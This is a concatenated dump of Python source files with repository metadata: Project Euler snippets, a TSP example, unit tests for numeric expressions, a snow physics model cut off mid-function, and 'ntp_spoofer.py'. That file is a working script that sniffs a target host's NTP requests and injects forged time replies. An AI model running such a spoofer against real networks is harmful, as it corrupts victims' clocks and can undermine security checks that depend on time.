print max( int(num[i])*int(num[i+1])*int(num[i+2])*int(num[i+3])*int(num[i+4]) for i in range(len(num)-4))
"""
"""
# Problem 9
sol=0
for i in range(1000,2,-1):
for j in range(i-1,2,-1):
if i**2==j**2+(1000-i-j)**2:
sol=i*j*(1000-i-j)
break
if sol>0: break
print sol
"""
#Problem 10
primes=[2,3]
n=3
while primes[-1]<2E6:
n+=2
p=True
for p in primes:
if p*p>n: break
if n%p==0: p=False; break
if p: primes.append(n)
print sum(primes)-primes[-1]
| 25.557692
| 1,009
| 0.748683
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,470
| 0.928571
|
5593fe3d21ad82b5382d08854df0a8f99eec0ed9
| 1,900
|
py
|
Python
|
src/ensae_teaching_cs/tests/american_cities.py
|
Jerome-maker/ensae_teaching_cs
|
43ea044361ee60c00c85aea354a7b25c21c0fd07
|
[
"MIT"
] | 73
|
2015-05-12T13:12:11.000Z
|
2021-12-21T11:44:29.000Z
|
src/ensae_teaching_cs/tests/american_cities.py
|
Jerome-maker/ensae_teaching_cs
|
43ea044361ee60c00c85aea354a7b25c21c0fd07
|
[
"MIT"
] | 90
|
2015-06-23T11:11:35.000Z
|
2021-03-31T22:09:15.000Z
|
src/ensae_teaching_cs/tests/american_cities.py
|
Jerome-maker/ensae_teaching_cs
|
43ea044361ee60c00c85aea354a7b25c21c0fd07
|
[
"MIT"
] | 65
|
2015-01-13T08:23:55.000Z
|
2022-02-11T22:42:07.000Z
|
"""
@file
@brief Function to test others functionalities
"""
import os
import pandas
from pyquickhelper.loghelper import fLOG
from ..faq.faq_matplotlib import graph_cities
from ..special import tsp_kruskal_algorithm, distance_haversine
def american_cities(df_or_filename, nb_cities=-1, img=None, fLOG=fLOG):
"""
Computes the :epkg:`TSP` for american cities.
@param df_or_filename dataframe
@param nb_cities number of cities to keep
@param img image to produce
@param fLOG logging function
@return dataframe (results)
"""
def haversine(p1, p2):
return distance_haversine(p1[0], p1[1], p2[0], p2[1])
if isinstance(df_or_filename, str):
df = pandas.read_csv(df_or_filename)
else:
df = df_or_filename
df["Longitude"] = -df["Longitude"]
df = df[df.Latitude < 52]
df = df[df.Longitude > -130].copy()
fLOG(df.columns)
df = df.dropna()
if nb_cities > 0:
df = df[:nb_cities].copy()
fLOG(df.shape)
points = [(row[1], row[2], row[3])
for row in df.itertuples(index=False)]
fLOG("number of cities:", len(points))
trip = tsp_kruskal_algorithm(
points, distance=haversine, fLOG=fLOG, max_iter=10)
# trip
dftrip = pandas.DataFrame(
trip, columns=["Latitude", "Longitude", "City"])
# graph
for i in range(0, dftrip.shape[0]):
if i % 10 != 0:
dftrip.loc[i, "City"] = ""
if img is not None:
import matplotlib.pyplot as plt
fig, ax = graph_cities(dftrip, markersize=3, linked=True, fLOG=fLOG,
fontcolor="red", fontsize='16', loop=True, figsize=(32, 32))
assert ax is not None
fig.savefig(img)
assert os.path.exists(img)
plt.close('all')
fLOG("end")
return dftrip
| 29.6875
| 91
| 0.596316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 479
| 0.252105
|
55948a0d8acfcbe1f96f58b36c1bb83505bd04f6
| 175
|
py
|
Python
|
first_task.py
|
yashika0607/Task1_python
|
4a867227f48f0c8ed9ad418fb412550eef3a7571
|
[
"Apache-2.0"
] | null | null | null |
first_task.py
|
yashika0607/Task1_python
|
4a867227f48f0c8ed9ad418fb412550eef3a7571
|
[
"Apache-2.0"
] | null | null | null |
first_task.py
|
yashika0607/Task1_python
|
4a867227f48f0c8ed9ad418fb412550eef3a7571
|
[
"Apache-2.0"
] | null | null | null |
#task 1
r=float(input("Enter the radius of the circle?\n"))
pi=3.143
area=pi*r*r
print("Area of the circle is ",area)
#task 2
x=input("Enter the file name\n")
print(x+".py")
| 17.5
| 51
| 0.674286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 101
| 0.577143
|
5594b24c92581e7c3ba26f490dea8b770f2cf8fd
| 2,049
|
py
|
Python
|
tools/ntp_spoofer.py
|
dschoonwinkel/pypacker
|
58c833f40207db746b0b2995ca3835a533e0258e
|
[
"BSD-3-Clause"
] | null | null | null |
tools/ntp_spoofer.py
|
dschoonwinkel/pypacker
|
58c833f40207db746b0b2995ca3835a533e0258e
|
[
"BSD-3-Clause"
] | null | null | null |
tools/ntp_spoofer.py
|
dschoonwinkel/pypacker
|
58c833f40207db746b0b2995ca3835a533e0258e
|
[
"BSD-3-Clause"
] | null | null | null |
"""Simple NTP spoofing tool."""
from pypacker.layer12.ethernet import Ethernet
from pypacker.layer3 import ip
from pypacker.layer4.udp import UDP
from pypacker.layer567 import ntp
from pypacker import psocket
# interface to listen on
IFACE = "wlan0"
# source address which commits a NTP request and we send a wrong answer
IP_SRC = "192.168.178.27"
#
# normal NTP request
#
"""
psock_req = psocket.SocketHndl(iface_name=IFACE, mode=psocket.SocketHndl.MODE_LAYER_3)
ntp_req = ip.IP(src_s=IP_SRC, dst_s="188.138.9.208", p=ip.IP_PROTO_UDP) +\
UDP(sport=1234, dport=123) +\
ntp.NTP(li=ntp.NO_WARNING, v=3, mode=ntp.CLIENT)
print("sending NTP request and waiting for answer..")
answer = psock_req.sr(ntp_req)[0][ntp.NTP]
"""
# print("answer is: %s" % answer)
#unpack_I = struct.Struct(">I").unpack
# print("seconds since 1.1.1900: %d" % unpack_I(answer.transmit_time[0:4])[0])
# psock_req.close()
#
# spoof NTP response
#
print("waiting for NTP request")
psock = psocket.SocketHndl(iface_name=IFACE, timeout=600)
filter = lambda p: p[ntp.NTP] is not None and p[ip.IP].src_s == IP_SRC
answer = psock.recvp(filter_match_recv=filter)[0]
answer_ntp = answer[ntp.NTP]
print("got NTP packet: %s" % answer_ntp)
ntp_answer_send = Ethernet(dst=answer[Ethernet].src, src=answer[Ethernet].dst) +\
ip.IP(src=answer[ip.IP].dst, dst_s=IP_SRC, p=ip.IP_PROTO_UDP) +\
UDP(sport=answer[UDP].dport, dport=answer[UDP].sport) +\
ntp.NTP(li=ntp.NO_WARNING, v=3, mode=ntp.SERVER, stratum=2, interval=4,
update_time=answer_ntp.transmit_time,
originate_time=answer_ntp.transmit_time,
receive_time=b"\x00" * 4 + answer_ntp.transmit_time[4:],
transmit_time=b"\x00" * 4 + answer_ntp.transmit_time[4:])
# alternative packet creation
"""
ntp_answer_send = answer.create_reverse()
layer_ntp = ntp_answer_send[ntp.NTP]
layer_ntp.mode = ntp.SERVER
layer_ntp.originate_time = answer_ntp.transmit_time
layer_ntp.receive_time = layer_ntp.transmit_time = b"\x00"*4 + answer_ntp.transmit_time[4:]
"""
psock.send(ntp_answer_send.bin())
psock.close()
| 32.52381
| 91
| 0.736945
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,061
| 0.517814
|
5594c3feafec578628223eff5ebd91b66138d3a5
| 7,524
|
py
|
Python
|
motsfinder/exprs/test_basics.py
|
daniel-dpk/distorted-motsfinder-public
|
8c2eec174c755c55b26b568243e58c2956a35257
|
[
"MIT"
] | 4
|
2019-08-26T09:50:26.000Z
|
2022-03-02T16:11:17.000Z
|
motsfinder/exprs/test_basics.py
|
daniel-dpk/distorted-motsfinder-public
|
8c2eec174c755c55b26b568243e58c2956a35257
|
[
"MIT"
] | 5
|
2021-03-31T19:55:34.000Z
|
2021-04-01T08:29:53.000Z
|
motsfinder/exprs/test_basics.py
|
daniel-dpk/distorted-motsfinder-public
|
8c2eec174c755c55b26b568243e58c2956a35257
|
[
"MIT"
] | 1
|
2019-09-18T14:15:33.000Z
|
2019-09-18T14:15:33.000Z
|
#!/usr/bin/env python3
from __future__ import print_function
from builtins import range, map
import unittest
import sys
import pickle
import numpy as np
from mpmath import mp
from testutils import DpkTestCase
from .numexpr import NumericExpression
from .numexpr import isclose
from .basics import OffsetExpression, DivisionExpression, SimpleSinExpression
from .basics import SimpleCoshExpression
class _TestExpr1(NumericExpression):
def __init__(self, a=1, **kw):
super(_TestExpr1, self).__init__(**kw)
self.a = a
def _expr_str(self): return "a x**2, where a=%r" % self.a
def _evaluator(self, use_mp):
a = self.a
return (lambda x: a*x**2, lambda x: 2*a*x, lambda x: 2*a, self.zero)
class _TestExpr2(NumericExpression):
def __init__(self, expr, a=1):
super(_TestExpr2, self).__init__(x=expr)
self.a = a
def _expr_str(self):
return "a/x, where a=%r, x=%s" % (self.a, self.x.str())
def _evaluator(self, use_mp):
a = self.a
x = self.x.evaluator(use_mp)
def f(t):
return a/x(t)
def df(t):
return -x.diff(t)*a/x(t)**2
def ddf(t):
xt = x(t)
dxt = x.diff(t, 1)
ddxt = x.diff(t, 2)
return a*(-ddxt/xt**2 + 2*dxt**2/xt**3)
return (f, df, ddf)
class _TestExpr3(NumericExpression):
def __init__(self, expr1, expr2, a=1, b=1):
super(_TestExpr3, self).__init__(x1=expr1, x2=expr2)
self.a = a
self.b = b
def _expr_str(self):
return ("a x1 + b x2, where a=%r, b=%r, x1=%s, x2=%s"
% (self.a, self.b, self.x1.str(), self.x2.str()))
def _evaluator(self, use_mp):
a, b = self.a, self.b
x1, x2 = self.x1.evaluator(use_mp), self.x2.evaluator(use_mp)
return (lambda t: a*x1(t) + b*x2(t), lambda t: a*x1.diff(t) + b*x2.diff(t))
class _TestExprDomain(NumericExpression):
def __init__(self, domain):
super(_TestExprDomain, self).__init__(domain=domain)
self.__domain = domain
def get_domain(self): return self.__domain
def _expr_str(self): return "id"
def _evaluator(self, use_mp): return (lambda x: x, lambda x: 1, self.zero)
class TestIsclose(DpkTestCase):
def test_float(self):
self.assertTrue(isclose(1e7+1, 1e7+1, rel_tol=0, abs_tol=0))
self.assertTrue(isclose(1e7+1, 1e7, rel_tol=1e-6))
self.assertFalse(isclose(1e7+1, 1e7, rel_tol=1e-8))
self.assertTrue(isclose(1e7+1, 1e7, rel_tol=0, abs_tol=2.0))
self.assertFalse(isclose(1e7+1, 1e7, rel_tol=0, abs_tol=0.5))
def test_mpmath(self):
with mp.workdps(30):
a = mp.mpf('1e7') + mp.mpf('1e-20')
b = mp.mpf('1e7')
self.assertTrue(isclose(a, a, rel_tol=0, abs_tol=0, use_mp=True))
self.assertFalse(isclose(a, b, use_mp=True))
with mp.workdps(26):
self.assertTrue(isclose(a, b, use_mp=True))
self.assertTrue(isclose(a, b, rel_tol=1e-26, abs_tol=0, use_mp=True))
self.assertFalse(isclose(a, b, rel_tol=1e-28, abs_tol=0, use_mp=True))
self.assertTrue(isclose(a, b, rel_tol=0, abs_tol=1e-19, use_mp=True))
self.assertFalse(isclose(a, b, rel_tol=0, abs_tol=1e-21, use_mp=True))
class TestNumexpr(DpkTestCase):
def test_expressions(self):
expr = _TestExpr2(_TestExpr1())
self.assertEqual(repr(expr), "<_TestExpr2(a/x, where a=1, x=(a x**2, where a=1))>")
self.assertEqual(expr.a, 1)
expr.a = 5
self.assertEqual(expr.a, 5)
def test_name(self):
expr = _TestExpr1()
self.assertEqual(expr.name, "_TestExpr1")
expr.name = "foo"
self.assertEqual(expr.name, "foo")
def test_pickle(self):
a = 1.5
expr = _TestExpr2(_TestExpr1(-1), a=a)
expr.name = "foo"
s = pickle.dumps(expr)
expr = pickle.loads(s)
self.assertIs(type(expr), _TestExpr2)
self.assertEqual(expr.a, 1.5)
self.assertIs(type(expr.x), _TestExpr1)
self.assertEqual(expr.x.a, -1)
self.assertEqual(expr.name, "foo")
def test_pickle_domain(self):
expr = _TestExpr1(domain=(0, 1))
s = pickle.dumps(expr)
expr = pickle.loads(s)
self.assertEqual(expr.domain, (0, 1))
expr = _TestExpr1(domain=(0, mp.pi))
s = pickle.dumps(expr)
expr = pickle.loads(s)
self.assertEqual(expr.domain, (0, mp.pi))
def test_evaluators(self):
a = 1.5
expr = _TestExpr2(_TestExpr1(), a=a)
f = expr.evaluator()
for t in np.linspace(0.1, 2, 4):
self.assertAlmostEqual(f(t), a/t**2)
for t in np.linspace(0.1, 2, 4):
self.assertAlmostEqual(f.diff(t), -2*a/t**3)
for t in np.linspace(0.1, 2, 4):
self.assertAlmostEqual(f.diff(t, 2), 6*a/t**4)
with self.assertRaises(NotImplementedError):
f.diff(0, 3)
def test_string_clashing(self):
expr1 = _TestExpr1(a=1)
expr2 = _TestExpr2(2, a=3)
comp1 = _TestExpr3(expr1, expr2)
expr2 = _TestExpr2(2, a=1)
expr1 = _TestExpr1(a=3)
comp2 = _TestExpr3(expr1, expr2)
e1 = comp1.evaluator()
e2 = comp2.evaluator()
# The expressions are different:
self.assertNotEqual(e1(.5), e2(.5))
# Their string are different too:
self.assertNotEqual(repr(comp1), repr(comp2))
def test_domain(self):
expr = _TestExprDomain([-1, 1])
e = expr.evaluator()
self.assertTrue(hasattr(e, 'domain'))
self.assertFalse(hasattr(e, 'domainX'))
self.assertEqual(e.domain[0], -1)
self.assertEqual(e.domain[1], 1)
expr = _TestExprDomain(([-1, 1], [0, 10]))
e = expr.evaluator()
self.assertTrue(hasattr(e, 'domain'))
self.assertEqual(e.domainX[0], -1)
self.assertEqual(e.domainX[1], 1)
self.assertEqual(e.domainY[0], 0)
self.assertEqual(e.domainY[1], 10)
f = e.function()
self.assertTrue(hasattr(f, 'domain'))
self.assertTrue(hasattr(f, 'domainX'))
self.assertTrue(hasattr(f, 'domainY'))
self.assertFalse(hasattr(f, 'domainZ'))
class TestOffsetExpression(DpkTestCase):
def test_offset(self):
expr = OffsetExpression(_TestExpr1(), 1.0)
e = expr.evaluator()
self.assertAlmostEqual(e(0), 1.0)
self.assertAlmostEqual(e(1), 2.0)
self.assertAlmostEqual(e(2), 5.0)
self.assertAlmostEqual(e.diff(0), 0.0)
self.assertAlmostEqual(e.diff(1), 2.0)
self.assertAlmostEqual(e.diff(2), 4.0)
self.assertAlmostEqual(e.diff(1, 2), 2.0)
class TestDivisionExpression(DpkTestCase):
def test_division(self):
expr = DivisionExpression(
SimpleSinExpression(),
OffsetExpression(SimpleCoshExpression(), 2),
)
with mp.workdps(30):
f = expr.evaluator(use_mp=True)
space = mp.linspace(0, mp.pi, 10)
for n in range(1, 5):
self.assertListAlmostEqual(
[f.diff(x, n) for x in space],
[mp.diff(f, x, n) for x in space],
delta=1e-28,
)
def run_tests():
suite = unittest.TestLoader().loadTestsFromModule(sys.modules[__name__])
return len(unittest.TextTestRunner(verbosity=2).run(suite).failures)
if __name__ == '__main__':
unittest.main()
| 34.356164
| 91
| 0.591042
| 6,885
| 0.915072
| 0
| 0
| 0
| 0
| 0
| 0
| 351
| 0.046651
|
559516145d3a91e65f7eba170cf38f3e8329840b
| 468
|
py
|
Python
|
python/Data Structures and Algorithms in Python Book/oop/fibonacciprogression.py
|
gauravssnl/Data-Structures-and-Algorithms
|
1c335c72ce514d4f95090241bbd6edf01a1141a8
|
[
"MIT"
] | 7
|
2020-05-10T09:57:23.000Z
|
2021-03-27T11:55:07.000Z
|
python/Data Structures and Algorithms in Python Book/oop/fibonacciprogression.py
|
gauravssnl/Data-Structures-and-Algorithms
|
1c335c72ce514d4f95090241bbd6edf01a1141a8
|
[
"MIT"
] | null | null | null |
python/Data Structures and Algorithms in Python Book/oop/fibonacciprogression.py
|
gauravssnl/Data-Structures-and-Algorithms
|
1c335c72ce514d4f95090241bbd6edf01a1141a8
|
[
"MIT"
] | 3
|
2021-03-27T03:42:57.000Z
|
2021-08-09T12:03:41.000Z
|
from progression import Progression
class FibonacciProgression(Progression):
def __init__(self, first=0, second=1):
super().__init__(start=first)
self._previous = second - first
def _advance(self):
self._previous, self._current = self._current, self._previous + self._current
if __name__ == "__main__":
fibonacci_progresssion = FibonacciProgression(first= 1, second= 2)
fibonacci_progresssion.print_progression(20)
| 29.25
| 85
| 0.713675
| 281
| 0.600427
| 0
| 0
| 0
| 0
| 0
| 0
| 10
| 0.021368
|
55966e42aa982766be05f8a6dbd86f8df5f992eb
| 18,587
|
py
|
Python
|
openamundsen/modules/snow/multilayermodel.py
|
openamundsen/openamundsen
|
2ac09eb34b0c72c84c421a0dac08d114a05b7b1c
|
[
"MIT"
] | 3
|
2021-05-28T06:46:36.000Z
|
2021-06-14T13:39:25.000Z
|
openamundsen/modules/snow/multilayermodel.py
|
openamundsen/openamundsen
|
2ac09eb34b0c72c84c421a0dac08d114a05b7b1c
|
[
"MIT"
] | 22
|
2021-04-28T12:31:58.000Z
|
2022-03-09T18:29:12.000Z
|
openamundsen/modules/snow/multilayermodel.py
|
openamundsen/openamundsen
|
2ac09eb34b0c72c84c421a0dac08d114a05b7b1c
|
[
"MIT"
] | 1
|
2021-06-01T12:48:54.000Z
|
2021-06-01T12:48:54.000Z
|
import numpy as np
from numba import njit, prange
from openamundsen import constants, constants as c, heatconduction
from openamundsen.snowmodel import SnowModel
from . import snow
class MultilayerSnowModel(SnowModel):
def __init__(self, model):
self.model = model
s = model.state.snow
num_snow_layers = len(model.config.snow.min_thickness)
s.add_variable('num_layers', '1', 'Number of snow layers', dtype=int, retain=True)
s.add_variable('thickness', 'm', 'Snow thickness', dim3=num_snow_layers, retain=True)
s.add_variable('density', 'kg m-3', 'Snow density', 'snow_density', dim3=num_snow_layers)
s.add_variable('ice_content', 'kg m-2', 'Ice content of snow', dim3=num_snow_layers, retain=True)
s.add_variable('liquid_water_content', 'kg m-2', 'Liquid water content of snow', 'liquid_water_content_of_snow_layer', dim3=num_snow_layers, retain=True)
s.add_variable('temp', 'K', 'Snow temperature', dim3=num_snow_layers, retain=True)
s.add_variable('therm_cond', 'W m-1 K-1', 'Thermal conductivity of snow', dim3=num_snow_layers, retain=True)
s.add_variable('heat_cap', 'J K-1 m-2', 'Areal heat capacity of snow', dim3=num_snow_layers)
def initialize(self):
roi = self.model.grid.roi
s = self.model.state.snow
s.swe[roi] = 0
s.depth[roi] = 0
s.area_fraction[roi] = 0
s.num_layers[roi] = 0
s.sublimation[roi] = 0
s.therm_cond[:, roi] = self.model.config.snow.thermal_conductivity
s.thickness[:, roi] = 0
s.ice_content[:, roi] = 0
s.liquid_water_content[:, roi] = 0
s.temp[:, roi] = constants.T0
def albedo_aging(self):
snow.albedo(self.model)
def compaction(self):
snow.compaction(self.model)
def accumulation(self):
model = self.model
s = model.state
pos = s.meteo.snowfall > 0
self.add_snow(
pos,
s.meteo.snowfall[pos],
density=snow.fresh_snow_density(s.meteo.wet_bulb_temp[pos]),
)
def heat_conduction(self):
model = self.model
s = model.state
_heat_conduction(
model.grid.roi_idxs,
s.snow.num_layers,
s.snow.thickness,
s.soil.thickness,
model.timestep,
s.snow.temp,
s.snow.therm_cond,
s.soil.therm_cond,
s.surface.heat_flux,
s.snow.heat_cap,
)
def melt(self):
model = self.model
s = model.state
_melt(
model.grid.roi_idxs,
model.timestep,
s.snow.num_layers,
s.snow.melt,
s.snow.thickness,
s.snow.temp,
s.snow.ice_content,
s.snow.liquid_water_content,
s.snow.heat_cap,
)
def sublimation(self):
model = self.model
s = model.state
# First resublimation
frost = -np.minimum(s.snow.sublimation, 0)
pos = frost > 0
self.add_snow(
pos,
frost[pos],
density=snow.fresh_snow_density(s.meteo.wet_bulb_temp[pos]),
)
# Then sublimation
_sublimation(
model.grid.roi_idxs,
model.timestep,
s.snow.num_layers,
s.snow.ice_content,
s.snow.thickness,
s.snow.sublimation,
)
def runoff(self):
model = self.model
s = model.state
_runoff(
model.grid.roi_idxs,
snow.max_liquid_water_content(model),
s.meteo.rainfall,
s.snow.num_layers,
s.snow.thickness,
s.snow.temp,
s.snow.ice_content,
s.snow.liquid_water_content,
s.snow.runoff,
s.snow.heat_cap,
)
def update_layers(self):
model = self.model
s = model.state
_update_layers(
model.grid.roi_idxs,
s.snow.num_layers,
np.array(model.config.snow.min_thickness),
s.snow.thickness,
s.snow.ice_content,
s.snow.liquid_water_content,
s.snow.heat_cap,
s.snow.temp,
s.snow.density,
s.snow.depth,
)
s.snow.albedo[s.snow.num_layers == 0] = np.nan
def update_properties(self):
snow.snow_properties(self.model)
def add_snow(
self,
pos,
ice_content,
liquid_water_content=0,
density=None,
albedo=None,
):
"""
Add snow to the top of the snowpack.
"""
model = self.model
s = model.state
ice_content = np.nan_to_num(ice_content, nan=0., copy=True)
pos_init = (s.snow.num_layers[pos] == 0) & (ice_content > 0)
pos_init_global = model.global_mask(pos_init, pos)
# If albedo is None, set it to the maximum albedo for currently snow-free pixels and keep
# the current albedo for the other pixels
if albedo is None:
albedo = s.snow.albedo[pos]
albedo[pos_init] = model.config.snow.albedo.max
s.snow.albedo[pos] = albedo
# Initialize first snow layer where necessary
s.snow.num_layers[pos_init_global] = 1
s.snow.temp[0, pos_init_global] = np.minimum(s.meteo.temp[pos_init_global], constants.T0)
# Add snow to first layer
s.snow.ice_content[0, pos] += ice_content
s.snow.liquid_water_content[0, pos] += liquid_water_content
s.snow.thickness[0, pos] += ice_content / density
@njit(cache=True, parallel=True)
def _melt(
roi_idxs,
timestep,
num_layers,
melt,
thickness,
temp,
ice_content,
liquid_water_content,
heat_cap,
):
"""
Calculate snowmelt following [1].
Parameters
----------
roi_idxs : ndarray(int, ndim=2)
(N, 2)-array specifying the (row, col) indices within the data arrays
that should be considered.
timestep : float
Model timestep (s).
num_layers : ndarray(float, ndim=2)
Number of snow layers.
melt : ndarray(float, ndim=2)
Snowmelt (kg m-2).
thickness : ndarray(float, ndim=3)
Snow thickness (m).
temp : ndarray(float, ndim=3)
Snow temperature (K).
ice_content : ndarray(float, ndim=3)
Ice content of snow (kg m-2).
liquid_water_content : ndarray(float, ndim=3)
Liquid water content of snow (kg m-2).
heat_cap : ndarray(float, ndim=3)
Areal heat capacity of snow (J K-1 m-2).
References
----------
.. [1] Essery, R. (2015). A factorial snowpack model (FSM 1.0).
Geoscientific Model Development, 8(12), 3867–3876.
https://doi.org/10.5194/gmd-8-3867-2015
"""
num_pixels = len(roi_idxs)
for idx_num in prange(num_pixels):
i, j = roi_idxs[idx_num]
ice_content_change = melt[i, j]
for k in range(num_layers[i, j]):
cold_content = heat_cap[k, i, j] * (c.T0 - temp[k, i, j])
if cold_content < 0:
ice_content_change -= cold_content / c.LATENT_HEAT_OF_FUSION
temp[k, i, j] = c.T0
if ice_content_change > 0:
if ice_content_change > ice_content[k, i, j]: # layer melts completely
ice_content_change -= ice_content[k, i, j]
thickness[k, i, j] = 0.
liquid_water_content[k, i, j] += ice_content[k, i, j]
ice_content[k, i, j] = 0.
else: # layer melts partially
thickness[k, i, j] *= (1 - ice_content_change / ice_content[k, i, j])
ice_content[k, i, j] -= ice_content_change
liquid_water_content[k, i, j] += ice_content_change
ice_content_change = 0.
@njit(cache=True, parallel=True)
def _sublimation(
roi_idxs,
timestep,
num_layers,
ice_content,
thickness,
sublimation,
):
"""
Calculate snow sublimation following [1].
Parameters
----------
roi_idxs : ndarray(int, ndim=2)
(N, 2)-array specifying the (row, col) indices within the data arrays
that should be considered.
timestep : float
Model timestep (s).
num_layers : ndarray(float, ndim=2)
Number of snow layers.
ice_content : ndarray(float, ndim=3)
Ice content of snow (kg m-2).
thickness : ndarray(float, ndim=3)
Snow thickness (m).
sublimation : ndarray(float, ndim=2)
Snow sublimation (kg m-2).
References
----------
.. [1] Essery, R. (2015). A factorial snowpack model (FSM 1.0).
Geoscientific Model Development, 8(12), 3867–3876.
https://doi.org/10.5194/gmd-8-3867-2015
"""
num_pixels = len(roi_idxs)
for idx_num in prange(num_pixels):
i, j = roi_idxs[idx_num]
ice_content_change = max(sublimation[i, j], 0.)
if ice_content_change > 0:
for k in range(num_layers[i, j]):
if ice_content_change > ice_content[k, i, j]: # complete sublimation of layer
ice_content_change -= ice_content[k, i, j]
thickness[k, i, j] = 0.
ice_content[k, i, j] = 0.
else: # partial sublimation
thickness[k, i, j] *= (1 - ice_content_change / ice_content[k, i, j])
ice_content[k, i, j] -= ice_content_change
ice_content_change = 0.
@njit(cache=True, parallel=True)
def _runoff(
roi_idxs,
max_liquid_water_content,
rainfall,
num_layers,
thickness,
temp,
ice_content,
liquid_water_content,
runoff,
heat_cap,
):
"""
Calculate snowmelt runoff following [1].
Parameters
----------
roi_idxs : ndarray(int, ndim=2)
(N, 2)-array specifying the (row, col) indices within the data arrays
that should be considered.
max_liquid_water_content : ndarray(float, ndim=3)
Maximum liquid water content (kg m-2).
rainfall : ndarray(float, ndim=2)
Rainfall amount (kg m-2).
num_layers : ndarray(float, ndim=2)
Number of snow layers.
thickness : ndarray(float, ndim=3)
Snow thickness (m).
temp : ndarray(float, ndim=3)
Snow temperature (K).
ice_content : ndarray(float, ndim=3)
Ice content of snow (kg m-2).
liquid_water_content : ndarray(float, ndim=3)
Liquid water content of snow (kg m-2).
runoff : ndarray(float, ndim=2)
Snow runoff (kg m-2).
heat_cap : ndarray(float, ndim=3)
Areal heat capacity of snow (J K-1 m-2).
References
----------
.. [1] Essery, R. (2015). A factorial snowpack model (FSM 1.0).
Geoscientific Model Development, 8(12), 3867–3876.
https://doi.org/10.5194/gmd-8-3867-2015
"""
num_pixels = len(roi_idxs)
for idx_num in prange(num_pixels):
i, j = roi_idxs[idx_num]
runoff[i, j] = rainfall[i, j]
if np.isnan(runoff[i, j]):
runoff[i, j] = 0.
for k in range(num_layers[i, j]):
liquid_water_content[k, i, j] += runoff[i, j]
if liquid_water_content[k, i, j] > max_liquid_water_content[k, i, j]:
runoff[i, j] = liquid_water_content[k, i, j] - max_liquid_water_content[k, i, j]
liquid_water_content[k, i, j] = max_liquid_water_content[k, i, j]
else:
runoff[i, j] = 0.
# Refreeze liquid water
cold_content = heat_cap[k, i, j] * (c.T0 - temp[k, i, j])
if cold_content > 0:
ice_content_change = min(
liquid_water_content[k, i, j],
cold_content / c.LATENT_HEAT_OF_FUSION,
)
liquid_water_content[k, i, j] -= ice_content_change
ice_content[k, i, j] += ice_content_change
temp[k, i, j] += c.LATENT_HEAT_OF_FUSION * ice_content_change / heat_cap[k, i, j]
@njit(parallel=True, cache=True)
def _heat_conduction(
roi_idxs,
num_layers,
snow_thickness,
soil_thickness,
timestep,
temp,
therm_cond_snow,
therm_cond_soil,
heat_flux,
heat_cap,
):
"""
Update snow layer temperatures.
Parameters
----------
roi_idxs : ndarray(int, ndim=2)
(N, 2)-array specifying the (row, col) indices within the data arrays
that should be considered.
num_layers : ndarray(float, ndim=2)
Number of snow layers.
snow_thickness : ndarray(float, ndim=3)
Snow thickness (m).
soil_thickness : ndarray(float, ndim=3)
Soil thickness (m).
timestep : float
Model timestep (s).
temp : ndarray(float, ndim=3)
Snow temperature (K).
therm_cond_snow : ndarray(float, ndim=3)
Snow thermal conductivity (W m-1 K-1).
therm_cond_soil : ndarray(float, ndim=3)
Soil thermal conductivity (W m-1 K-1).
heat_flux : ndarray(float, ndim=2)
Surface heat flux (W m-2).
heat_cap : ndarray(float, ndim=3)
Areal heat capacity of snow (J K-1 m-2).
References
----------
.. [1] Essery, R. (2015). A factorial snowpack model (FSM 1.0).
Geoscientific Model Development, 8(12), 3867–3876.
https://doi.org/10.5194/gmd-8-3867-2015
"""
num_pixels = len(roi_idxs)
for idx_num in prange(num_pixels):
i, j = roi_idxs[idx_num]
ns = num_layers[i, j]
if ns > 0:
temp[:ns, i, j] += heatconduction.temp_change(
snow_thickness[:ns, i, j],
timestep,
temp[:ns, i, j],
therm_cond_snow[:ns, i, j],
temp[-1, i, j],
soil_thickness[0, i, j],
therm_cond_soil[0, i, j],
heat_flux[i, j],
heat_cap[:ns, i, j],
)
@njit(cache=True, parallel=True)
def _update_layers(
roi_idxs,
num_layers,
min_thickness,
thickness,
ice_content,
liquid_water_content,
heat_cap,
temp,
density,
depth,
):
"""
Update snow layers.
Parameters
----------
roi_idxs : ndarray(int, ndim=2)
(N, 2)-array specifying the (row, col) indices within the data arrays
that should be considered.
num_layers : ndarray(float, ndim=2)
Number of snow layers.
min_thickness : ndarray(float, ndim=1)
Minimum snow layer thicknesses (m).
thickness : ndarray(float, ndim=3)
Snow thickness (m).
ice_content : ndarray(float, ndim=3)
Ice content of snow (kg m-2).
liquid_water_content : ndarray(float, ndim=3)
Liquid water content of snow (kg m-2).
heat_cap : ndarray(float, ndim=3)
Areal heat capacity of snow (J K-1 m-2).
temp : ndarray(float, ndim=3)
Snow temperature (K).
density : ndarray(float, ndim=3)
Snow density (kg m-3).
depth : ndarray(float, ndim=2)
Snow depth (m).
References
----------
.. [1] Essery, R. (2015). A factorial snowpack model (FSM 1.0).
Geoscientific Model Development, 8(12), 3867–3876.
https://doi.org/10.5194/gmd-8-3867-2015
"""
max_num_layers = len(min_thickness)
num_layers_prev = num_layers.copy()
thickness_prev = thickness.copy()
ice_content_prev = ice_content.copy()
liquid_water_content_prev = liquid_water_content.copy()
energy_prev = heat_cap * (temp - c.T0) # energy content (J m-2)
num_pixels = len(roi_idxs)
for idx_num in prange(num_pixels):
i, j = roi_idxs[idx_num]
num_layers[i, j] = 0
thickness[:, i, j] = 0.
ice_content[:, i, j] = 0.
liquid_water_content[:, i, j] = 0.
temp[:, i, j] = c.T0
density[:, i, j] = np.nan
internal_energy = np.zeros(max_num_layers)
if depth[i, j] > 0:
new_thickness = depth[i, j]
# Update thicknesses and number of layers
for k in range(max_num_layers):
thickness[k, i, j] = min_thickness[k]
new_thickness -= min_thickness[k]
if new_thickness <= min_thickness[k] or k == max_num_layers - 1:
thickness[k, i, j] += new_thickness
break
# Set thin snow layers to 0 to avoid numerical artifacts
# TODO should this be done at some other location?
for k in range(max_num_layers):
if thickness[k, i, j] < 1e-6:
thickness[k, i, j] = 0.
ns = (thickness[:, i, j] > 0).sum() # new number of layers
new_thickness = thickness[0, i, j]
k_new = 0
# TODO optimize this loop
for k_old in range(num_layers_prev[i, j]):
while True: # TODO replace with normal loop
weight = min(new_thickness / thickness_prev[k_old, i, j], 1.)
ice_content[k_new, i, j] += weight * ice_content_prev[k_old, i, j]
